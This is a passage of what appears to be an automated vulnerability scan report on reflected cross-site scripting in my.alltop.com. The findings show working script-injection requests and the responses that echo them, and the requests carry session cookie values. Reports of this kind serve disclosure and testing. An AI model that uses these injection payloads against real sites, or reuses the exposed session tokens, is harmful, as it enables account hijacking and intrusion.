User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:33 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:33 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:33 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)b4f0a"><script>alert(1)</script>ed05747b51" method="post" accept-charset="utf-8">
...[SNIP]...

1.71. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80c18"><script>alert(1)</script>1dd78b143d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)?80c18"><script>alert(1)</script>1dd78b143d9=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:28 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:30 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:30 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)?80c18"><script>alert(1)</script>1dd78b143d9=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.72. http://my.alltop.com/alpha/d ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d

Issue detail

The value of the '"--></style></script><script>netsparker(0x00017C)</script> request parameter is copied into the HTML document as plain text between tags. The payload 14abe<script>alert(1)</script>f1b3e1969f4 was submitted in the '"--></style></script><script>netsparker(0x00017C)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d?'"--></style></script><script>netsparker(0x00017C)</script>14abe<script>alert(1)</script>f1b3e1969f4 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>14abe<script>alert(1)</script>f1b3e1969f4" method="post" accept-charset="utf-8">
...[SNIP]...

1.73. http://my.alltop.com/alpha/d [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50af3"><script>alert(1)</script>6a46101e2ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d50af3"><script>alert(1)</script>6a46101e2ad HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:42 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:43 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:43 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d50af3"><script>alert(1)</script>6a46101e2ad" method="post" accept-charset="utf-8">
...[SNIP]...

1.74. http://my.alltop.com/alpha/d [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd46b"><script>alert(1)</script>de24a9099e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d?bd46b"><script>alert(1)</script>de24a9099e8=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:41 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:42 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:42 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d?bd46b"><script>alert(1)</script>de24a9099e8=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.75. http://my.alltop.com/alpha/d [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69c21"><script>alert(1)</script>ad3b91a408c was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E69c21"><script>alert(1)</script>ad3b91a408c HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E69c21"><script>alert(1)</script>ad3b91a408c" method="post" accept-charset="utf-8">
...[SNIP]...

1.76. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da4e7"><script>alert(1)</script>d96af54cd76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d'%22--%3E%3Cda4e7"><script>alert(1)</script>d96af54cd76/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:09 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:10 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:10 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d'%22--%3E%3Cda4e7"><script>alert(1)</script>d96af54cd76/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.77. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c52d"><script>alert(1)</script>542e0022250 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d'%22--%3E%3C/style%3E%3C9c52d"><script>alert(1)</script>542e0022250/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:14 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d'%22--%3E%3C/style%3E%3C9c52d"><script>alert(1)</script>542e0022250/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.78. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df22f"><script>alert(1)</script>9bc35107a2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3Cdf22f"><script>alert(1)</script>9bc35107a2a/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:16 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

